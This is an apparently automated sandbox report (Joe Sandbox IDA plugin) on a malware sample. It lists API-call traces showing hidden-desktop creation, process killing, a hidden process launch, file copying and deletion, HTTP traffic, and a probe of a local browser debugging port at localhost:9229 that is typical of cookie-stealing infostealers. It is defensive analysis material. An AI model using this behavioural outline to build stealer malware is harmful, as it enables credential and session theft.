Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

wsprintfA.USER32 ref: 00819A6D
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00819A8E
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00819AAB

Part of subcall function 00834B17: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00834B30
Part of subcall function 00834B17: Process32First.KERNEL32(00000000,00000128), ref: 00834B40
Part of subcall function 00834B17: Process32Next.KERNEL32(00000000,00000128), ref: 00834B52
Part of subcall function 00834B17: StrCmpCA.SHLWAPI(?,?), ref: 00834B64
Part of subcall function 00834B17: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00834B79
Part of subcall function 00834B17: TerminateProcess.KERNEL32(00000000,00000000), ref: 00834B88
Part of subcall function 00834B17: CloseHandle.KERNEL32(00000000), ref: 00834B8F
Part of subcall function 00834B17: Process32Next.KERNEL32(00000000,00000128), ref: 00834B9D
Part of subcall function 00834B17: CloseHandle.KERNEL32(00000000), ref: 00834BA8

memset.MSVCRT ref: 00819AC9
lstrcat.KERNEL32(00000000,?), ref: 00819ADF
lstrcat.KERNEL32(00000000,?), ref: 00819AF0
lstrcat.KERNEL32(00000000,00434B68), ref: 00819B02
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00819B3B
lstrcpy.KERNEL32(00000000,?), ref: 00819B6A
StrStrA.SHLWAPI(00000000,00638C5C), ref: 00819B80
lstrcpyn.KERNEL32(006393D0,00000000,00000000), ref: 00819B9F
lstrlen.KERNEL32(?), ref: 00819BB2
wsprintfA.USER32 ref: 00819BC2
lstrcpy.KERNEL32(?,00000000), ref: 00819BD8
memset.MSVCRT ref: 00819BED
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 00819C3F
Sleep.KERNEL32(00001388), ref: 00819C4E

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

Part of subcall function 00834BB7: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00834BD0
Part of subcall function 00834BB7: Process32First.KERNEL32(00000000,00000128), ref: 00834BE0
Part of subcall function 00834BB7: Process32Next.KERNEL32(00000000,00000128), ref: 00834BF2
Part of subcall function 00834BB7: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00834C13
Part of subcall function 00834BB7: TerminateProcess.KERNEL32(00000000,00000000), ref: 00834C22
Part of subcall function 00834BB7: CloseHandle.KERNEL32(00000000), ref: 00834C29
Part of subcall function 00834BB7: Process32Next.KERNEL32(00000000,00000128), ref: 00834C37
Part of subcall function 00834BB7: CloseHandle.KERNEL32(00000000), ref: 00834C42

CloseDesktop.USER32(?), ref: 00819C83

Strings

D, xrefs: 00819C00

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32lstrcat$CloseProcess$CreateHandleNext$DesktopOpen$FirstSnapshotTerminateToolhelp32memsetwsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
String ID: D
API String ID: 3267785154-2746444292
Opcode ID: 9ec6325b16736c51726cbf95bac39732b0b919a1f627affdadc2253ae2a6b529
Instruction ID: 3516496d816ca1dbb2746a7f4422edcf0031e2a765484cb5c9156bc99b3b8bf7
Opcode Fuzzy Hash: 9ec6325b16736c51726cbf95bac39732b0b919a1f627affdadc2253ae2a6b529
Instruction Fuzzy Hash: 87916FB1A00218ABDB14DBA4DC45FDE77B9FF48700F108199F609E7290DBB4AA54CFA1

Function 008199D7 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 233stringsleepprocessCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 00819A07
lstrcat.KERNEL32(?,?), ref: 00819A18
lstrcat.KERNEL32(?,00434BAC), ref: 00819A2A

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

wsprintfA.USER32 ref: 00819A6D
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00819A8E
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00819AAB

Part of subcall function 00834B17: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00834B30
Part of subcall function 00834B17: Process32First.KERNEL32(00000000,00000128), ref: 00834B40
Part of subcall function 00834B17: Process32Next.KERNEL32(00000000,00000128), ref: 00834B52
Part of subcall function 00834B17: StrCmpCA.SHLWAPI(?,?), ref: 00834B64
Part of subcall function 00834B17: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00834B79
Part of subcall function 00834B17: TerminateProcess.KERNEL32(00000000,00000000), ref: 00834B88
Part of subcall function 00834B17: CloseHandle.KERNEL32(00000000), ref: 00834B8F
Part of subcall function 00834B17: Process32Next.KERNEL32(00000000,00000128), ref: 00834B9D
Part of subcall function 00834B17: CloseHandle.KERNEL32(00000000), ref: 00834BA8

memset.MSVCRT ref: 00819AC9
lstrcat.KERNEL32(00000000,?), ref: 00819ADF
lstrcat.KERNEL32(00000000,?), ref: 00819AF0
lstrcat.KERNEL32(00000000,00434B68), ref: 00819B02
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00819B3B
lstrcpy.KERNEL32(00000000,?), ref: 00819B6A
StrStrA.SHLWAPI(00000000,00638C5C), ref: 00819B80
lstrcpyn.KERNEL32(006393D0,00000000,00000000), ref: 00819B9F
lstrlen.KERNEL32(?), ref: 00819BB2
wsprintfA.USER32 ref: 00819BC2
lstrcpy.KERNEL32(?,00000000), ref: 00819BD8
memset.MSVCRT ref: 00819BED
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 00819C3F
Sleep.KERNEL32(00001388), ref: 00819C4E

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

Part of subcall function 00834BB7: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00834BD0
Part of subcall function 00834BB7: Process32First.KERNEL32(00000000,00000128), ref: 00834BE0
Part of subcall function 00834BB7: Process32Next.KERNEL32(00000000,00000128), ref: 00834BF2
Part of subcall function 00834BB7: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00834C13
Part of subcall function 00834BB7: TerminateProcess.KERNEL32(00000000,00000000), ref: 00834C22
Part of subcall function 00834BB7: CloseHandle.KERNEL32(00000000), ref: 00834C29
Part of subcall function 00834BB7: Process32Next.KERNEL32(00000000,00000128), ref: 00834C37
Part of subcall function 00834BB7: CloseHandle.KERNEL32(00000000), ref: 00834C42

CloseDesktop.USER32(?), ref: 00819C83

Strings

D, xrefs: 00819C00

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32lstrcat$CloseProcess$CreateHandleNext$DesktopOpen$FirstSnapshotTerminateToolhelp32memsetwsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
String ID: D
API String ID: 3267785154-2746444292
Opcode ID: eedfdef4d1e2102d9b779ddd2a7df7d1417518160c5850d981991810b6207b00
Instruction ID: 94727915595fa57ab5263b252eb19b4ab986c72226a32731753bb94b7eb2cbe5
Opcode Fuzzy Hash: eedfdef4d1e2102d9b779ddd2a7df7d1417518160c5850d981991810b6207b00
Instruction Fuzzy Hash: D0915FB1A00218ABDB14DBA4DC45FDE77B9FF48700F108199F609E7290DBB4AA54CFA1

Function 004219F0 Relevance: 37.8, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00421A1F
lstrlenA.KERNEL32(00906FF0,00000000,00000000,?,?,00421D51), ref: 00421A30
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A57
lstrcatA.KERNEL32(00000000,00000000), ref: 00421A62
lstrcpy.KERNEL32(00000000,00000000), ref: 00421A91
lstrlenA.KERNEL32(00434FA4,?,?,00421D51), ref: 00421AA3
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC4
lstrcatA.KERNEL32(00000000,00434FA4,?,?,00421D51), ref: 00421AD0
lstrcpy.KERNEL32(00000000,00000000), ref: 00421AFF
lstrlenA.KERNEL32(00907000,?,?,00421D51), ref: 00421B15
lstrcpy.KERNEL32(00000000,00000000), ref: 00421B3C
lstrcatA.KERNEL32(00000000,00000000), ref: 00421B47
lstrcpy.KERNEL32(00000000,00000000), ref: 00421B76
lstrlenA.KERNEL32(00434FA4,?,?,00421D51), ref: 00421B88
lstrcpy.KERNEL32(00000000,00000000), ref: 00421BA9
lstrcatA.KERNEL32(00000000,00434FA4,?,?,00421D51), ref: 00421BB5
lstrcpy.KERNEL32(00000000,00000000), ref: 00421BE4
lstrlenA.KERNEL32(00907030,?,?,00421D51), ref: 00421BFA
lstrcpy.KERNEL32(00000000,00000000), ref: 00421C21
lstrcatA.KERNEL32(00000000,00000000), ref: 00421C2C
lstrcpy.KERNEL32(00000000,00000000), ref: 00421C5B
lstrlenA.KERNEL32(00907040,?,?,00421D51), ref: 00421C71
lstrcpy.KERNEL32(00000000,00000000), ref: 00421C98
lstrcatA.KERNEL32(00000000,00000000), ref: 00421CA3
lstrcpy.KERNEL32(00000000,00000000), ref: 00421CD2

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: e57df1d416dd361fdf4197173fe2905ec9e469c27f93556cea6e1f9651bb5ec3
Instruction ID: 339dc49a33f374203a517c3620415c9c9915682babd76ed29869d6961663b44f
Opcode Fuzzy Hash: e57df1d416dd361fdf4197173fe2905ec9e469c27f93556cea6e1f9651bb5ec3
Instruction Fuzzy Hash: 359131B07017039FD7209FBADD88A17B7E9AF14344F54542EA886D33A1DBB8E8418B64

Function 008113F7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00811411

Part of subcall function 00811387: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0081139C
Part of subcall function 00811387: RtlAllocateHeap.NTDLL(00000000), ref: 008113A3
Part of subcall function 00811387: RegOpenKeyExA.ADVAPI32(80000001,0043175C,00000000,00020119,?), ref: 008113C0
Part of subcall function 00811387: RegQueryValueExA.ADVAPI32(?,00431750,00000000,00000000,00000000,000000FF), ref: 008113DA
Part of subcall function 00811387: RegCloseKey.ADVAPI32(?), ref: 008113E4

lstrcat.KERNEL32(?,00000000), ref: 00811427
lstrlen.KERNEL32(?), ref: 00811434
lstrcat.KERNEL32(?,00431780), ref: 0081144F
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00811486
lstrlen.KERNEL32(006389F0), ref: 00811494
lstrcpy.KERNEL32(00000000,?), ref: 008114B8
lstrcat.KERNEL32(00000000,006389F0), ref: 008114C0
lstrlen.KERNEL32(00431788), ref: 008114CB
lstrcpy.KERNEL32(00000000,00000000), ref: 008114EF
lstrcat.KERNEL32(00000000,00431788), ref: 008114FB
lstrcpy.KERNEL32(00000000,00000000), ref: 00811521
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00811566
lstrlen.KERNEL32(00638CA4), ref: 00811575
lstrcpy.KERNEL32(00000000,?), ref: 0081159C
lstrcat.KERNEL32(00000000,?), ref: 008115A4
lstrcpy.KERNEL32(00000000,00000000), ref: 008115DF
lstrcat.KERNEL32(00000000), ref: 008115EC
lstrcpy.KERNEL32(00000000,00000000), ref: 00811613
CopyFileA.KERNEL32(?,?,00000001), ref: 0081163C
lstrcpy.KERNEL32(00000000,?), ref: 00811668
lstrcpy.KERNEL32(00000000,?), ref: 008116A4

Part of subcall function 0082F227: lstrcpy.KERNEL32(00000000,?), ref: 0082F259

DeleteFileA.KERNEL32(?), ref: 008116D8
memset.MSVCRT ref: 008116F5

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
String ID:
API String ID: 1397529057-0
Opcode ID: 02a401fdbfd53112a87c377777521942dd75233243d21b937a97fbc6e85f9cba
Instruction ID: 2e34116a20d27511929d837c464850221918a49eb271d17c7267234b203d8893
Opcode Fuzzy Hash: 02a401fdbfd53112a87c377777521942dd75233243d21b937a97fbc6e85f9cba
Instruction Fuzzy Hash: E3A147B1A012469BCB14ABA8DC89ADE7BBEFF44304F044024FA05E7251EB34DD94CBA1

Function 0082AF69 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 0082AF86
lstrlen.KERNEL32(00638DD4), ref: 0082AF9C
lstrcpy.KERNEL32(00000000,00000000), ref: 0082AFC4
lstrcat.KERNEL32(00000000,00000000), ref: 0082AFCF
lstrcpy.KERNEL32(00000000,00000000), ref: 0082AFF8
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B03B
lstrcat.KERNEL32(00000000,00000000), ref: 0082B045
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B06E
lstrlen.KERNEL32(00434ADC), ref: 0082B088
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B0AA
lstrcat.KERNEL32(00000000,00434ADC), ref: 0082B0B6
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B0DF
lstrlen.KERNEL32(00434ADC), ref: 0082B0F1
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B113
lstrcat.KERNEL32(00000000,00434ADC), ref: 0082B11F
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B148
lstrlen.KERNEL32(00638DB8), ref: 0082B15E
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B186
lstrcat.KERNEL32(00000000,00000000), ref: 0082B191
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B1BA
lstrcpy.KERNEL32(00000000,?), ref: 0082B1F6
lstrcat.KERNEL32(00000000,00000000), ref: 0082B200
lstrcpy.KERNEL32(00000000,00000000), ref: 0082B226
lstrlen.KERNEL32(00000000), ref: 0082B23C
lstrcpy.KERNEL32(00000000,00638A98), ref: 0082B26F

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen
String ID:
API String ID: 2762123234-0
Opcode ID: cd65f75ed4db879bd52a93410a766dc55dafbe49688ec912da15a99145c2f284
Instruction ID: 527946f1df87b07716627045b8842523267cd8fd9c526558b803d7344edeb79e
Opcode Fuzzy Hash: cd65f75ed4db879bd52a93410a766dc55dafbe49688ec912da15a99145c2f284
Instruction Fuzzy Hash: CCB16BB09016269BCB15AF68DC89AAE77BAFF40304F044524B914E7251EB78DDA4CBD2

Function 00831C57 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00831C86
lstrlen.KERNEL32(00638DEC), ref: 00831C97
lstrcpy.KERNEL32(00000000,00000000), ref: 00831CBE
lstrcat.KERNEL32(00000000,00000000), ref: 00831CC9
lstrcpy.KERNEL32(00000000,00000000), ref: 00831CF8
lstrlen.KERNEL32(00434FA4), ref: 00831D0A
lstrcpy.KERNEL32(00000000,00000000), ref: 00831D2B
lstrcat.KERNEL32(00000000,00434FA4), ref: 00831D37
lstrcpy.KERNEL32(00000000,00000000), ref: 00831D66
lstrlen.KERNEL32(00638B1C), ref: 00831D7C
lstrcpy.KERNEL32(00000000,00000000), ref: 00831DA3
lstrcat.KERNEL32(00000000,00000000), ref: 00831DAE
lstrcpy.KERNEL32(00000000,00000000), ref: 00831DDD
lstrlen.KERNEL32(00434FA4), ref: 00831DEF
lstrcpy.KERNEL32(00000000,00000000), ref: 00831E10
lstrcat.KERNEL32(00000000,00434FA4), ref: 00831E1C
lstrcpy.KERNEL32(00000000,00000000), ref: 00831E4B
lstrlen.KERNEL32(00638D70), ref: 00831E61
lstrcpy.KERNEL32(00000000,00000000), ref: 00831E88
lstrcat.KERNEL32(00000000,00000000), ref: 00831E93
lstrcpy.KERNEL32(00000000,00000000), ref: 00831EC2
lstrlen.KERNEL32(00638D6C), ref: 00831ED8
lstrcpy.KERNEL32(00000000,00000000), ref: 00831EFF
lstrcat.KERNEL32(00000000,00000000), ref: 00831F0A
lstrcpy.KERNEL32(00000000,00000000), ref: 00831F39

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen
String ID:
API String ID: 1049500425-0
Opcode ID: fe71b3fbfc5cbae770379cc3bfd9587d6ac0fe7b74edb42614f7535acbb1c63c
Instruction ID: 4d42ef43c50ca2a4ad84076e74254394521fe7a2a53cf3f5db94bcd2c5d5409e
Opcode Fuzzy Hash: fe71b3fbfc5cbae770379cc3bfd9587d6ac0fe7b74edb42614f7535acbb1c63c
Instruction Fuzzy Hash: A0913AB46007039FDB20AFB9CD88A5AB7EDFF44744F145828B982D3651DB78E851CBA0

Function 00824B27 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00824B5A
LocalAlloc.KERNEL32(00000040,?), ref: 00824B8C
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00824BD9
lstrlen.KERNEL32(00434B68), ref: 00824BE4
lstrcpy.KERNEL32(00000000,00000000), ref: 00824C01
lstrcat.KERNEL32(00000000,00434B68), ref: 00824C0D
lstrcpy.KERNEL32(00000000,00000000), ref: 00824C32
lstrcpy.KERNEL32(00000000,00000000), ref: 00824C5F
lstrcat.KERNEL32(00000000,00000000), ref: 00824C6A
lstrcpy.KERNEL32(00000000,00000000), ref: 00824C91
StrStrA.SHLWAPI(?,00000000), ref: 00824CA3
lstrlen.KERNEL32(?), ref: 00824CB7
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00824CF8
lstrcpy.KERNEL32(00000000,?), ref: 00824D7F
lstrcpy.KERNEL32(00000000,?), ref: 00824DA8
lstrcpy.KERNEL32(00000000,?), ref: 00824DD1
lstrcpy.KERNEL32(00000000,?), ref: 00824DF7
lstrcpy.KERNEL32(00000000,?), ref: 00824E24

Strings

^userContextId=4294967295, xrefs: 00824D1B
moz-extension+++, xrefs: 00824CFE

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcatlstrlen$AllocLocal
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 4107348322-3310892237
Opcode ID: 7e6e3c2d30772af9a6dbe57a3970331d2164d16c2bf6bd3c1871a8eee00167cd
Instruction ID: 660412c0f26a03eb746cc390bab91d90a567a7a142c25f980bcc1b3ffac2a025
Opcode Fuzzy Hash: 7e6e3c2d30772af9a6dbe57a3970331d2164d16c2bf6bd3c1871a8eee00167cd
Instruction Fuzzy Hash: B0B1D0B5A012569BCB24EF7CD989AAE7BA9FF44304F045028F901E7210DB34EC94CBE1

Function 0082F73F Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00638DB4), ref: 0082F75C
lstrcpy.KERNEL32(00000000,?), ref: 0082F7EA
lstrcpy.KERNEL32(00000000,00000000), ref: 0082F80E
lstrcpy.KERNEL32(00000000,00000000), ref: 0082F8C2
lstrcpy.KERNEL32(00000000,00638DB4), ref: 0082F902
lstrcpy.KERNEL32(00000000,00638C7C), ref: 0082F931
lstrcpy.KERNEL32(00000000,00000000), ref: 0082F9E5
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0082FA63
lstrcpy.KERNEL32(00000000,?), ref: 0082FA93
lstrcpy.KERNEL32(00000000,?), ref: 0082FAE1
StrCmpCA.SHLWAPI(?,ERROR), ref: 0082FB5F
lstrlen.KERNEL32(00638DBC), ref: 0082FB8D
lstrcpy.KERNEL32(00000000,00638DBC), ref: 0082FBB8
lstrcpy.KERNEL32(00000000,00000000), ref: 0082FBDA
lstrcpy.KERNEL32(00000000,?), ref: 0082FC2B
StrCmpCA.SHLWAPI(?,ERROR), ref: 0082FE79
lstrlen.KERNEL32(00638BB0), ref: 0082FEA7
lstrcpy.KERNEL32(00000000,00638BB0), ref: 0082FED2
lstrcpy.KERNEL32(00000000,00000000), ref: 0082FEF4
lstrcpy.KERNEL32(00000000,?), ref: 0082FF45

Strings

ERROR, xrefs: 0082FB59, 0082FE73, 00830197

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ERROR
API String ID: 367037083-2861137601
Opcode ID: 9c389040a0931cff84f6a8ce16c057d4dd3fd095c43156bdc360670e935f1f34
Instruction ID: 01153348dc4b7e9dbed7a2a79eecb06484d6d975b25877c24ca7996329bb1eb3
Opcode Fuzzy Hash: 9c389040a0931cff84f6a8ce16c057d4dd3fd095c43156bdc360670e935f1f34
Instruction Fuzzy Hash: 3CF13870A012168FDB24CF29E994A69B7F5FF44314B1981B9D909DB3A2EB71DC81CF90

Function 00816EA7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 229networkstringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00816ED6
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00816F29
InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 00816F3C
StrCmpCA.SHLWAPI(?,00638C80), ref: 00816F54
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816F7C
HttpOpenRequestA.WININET(00000000,00434AC0,?,00638AB4,00000000,00000000,-00400100,00000000), ref: 00816FB7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00816FDE
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816FED
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0081700C
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00817066
lstrcpy.KERNEL32(00000000,?), ref: 008170C2
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 008170E4
InternetCloseHandle.WININET(00000000), ref: 008170F5
InternetCloseHandle.WININET(?), ref: 008170FF
InternetCloseHandle.WININET(00000000), ref: 00817109
lstrcpy.KERNEL32(00000000,00000000), ref: 0081712A

Strings

ERROR, xrefs: 00817019

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR
API String ID: 3687753495-2861137601
Opcode ID: 10eecb2712b1ebf3cd3b69d88b62727bb4550a32710522d9711ab1fa4818b2f2
Instruction ID: 9709b346c98cd925fa4a217d47d4fb7e9e00385da19cf5e5f5de9ff5de583dc6
Opcode Fuzzy Hash: 10eecb2712b1ebf3cd3b69d88b62727bb4550a32710522d9711ab1fa4818b2f2
Instruction Fuzzy Hash: 6A818E71A40716ABEB20DBA4DC45FEE77B9FF48700F144168F904E7280DB74AD858BA1

Function 0082C1D7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 203stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C20A
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C23D
lstrlen.KERNEL32(00434E14), ref: 0082C248
lstrcpy.KERNEL32(00000000,?), ref: 0082C268
lstrcat.KERNEL32(00000000,00434E14), ref: 0082C274
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C297
lstrcat.KERNEL32(00000000,00000000), ref: 0082C2A2
lstrlen.KERNEL32(00434E4C), ref: 0082C2AD
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C2CA
lstrcat.KERNEL32(00000000,00434E4C), ref: 0082C2D6
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C2FD
lstrlen.KERNEL32(00434E50), ref: 0082C31D
lstrcpy.KERNEL32(00000000,?), ref: 0082C33F
lstrcat.KERNEL32(00000000,00434E50), ref: 0082C34B
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C371
ShellExecuteEx.SHELL32(?), ref: 0082C3C3

Strings

<, xrefs: 0082C3A4

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
String ID: <
API String ID: 4016326548-4251816714
Opcode ID: efdcca4d65dc87d043f2d3248b7fad0a8e6929005e2d2ef5aae30341966b1c8e
Instruction ID: d9126f0c2799ea3e225b0831fa6bc3a96c9e2a89cc1e811155ea2551c4479b7a
Opcode Fuzzy Hash: efdcca4d65dc87d043f2d3248b7fad0a8e6929005e2d2ef5aae30341966b1c8e
Instruction Fuzzy Hash: AD61D4B1A002669FCB15AFB8EC89AAE7BB9FF04304F044429F505E3251DB78D995CBD1

Function 004090C0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 161networkstringfileCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 004090DF
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
InternetCloseHandle.WININET(00000000), ref: 00409109
strlen.MSVCRT ref: 00409125
InternetReadFile.WININET(?,?,?,00000000), ref: 00409166
InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409197
InternetCloseHandle.WININET(00000000), ref: 004091A2
InternetCloseHandle.WININET(00000000), ref: 004091A9
strlen.MSVCRT ref: 004091BA
strlen.MSVCRT ref: 004091ED
strlen.MSVCRT ref: 0040922E

Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FAF
Part of subcall function 00417F70: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417FC9
Part of subcall function 00417F70: memchr.MSVCRT ref: 00417FE8

strlen.MSVCRT ref: 0040924C

Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996

Strings

"ws://, xrefs: 00409229, 00409234
http://localhost:9229/json, xrefs: 004090F6
"webSocketDebuggerUrl":, xrefs: 004091B5, 004091C0

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
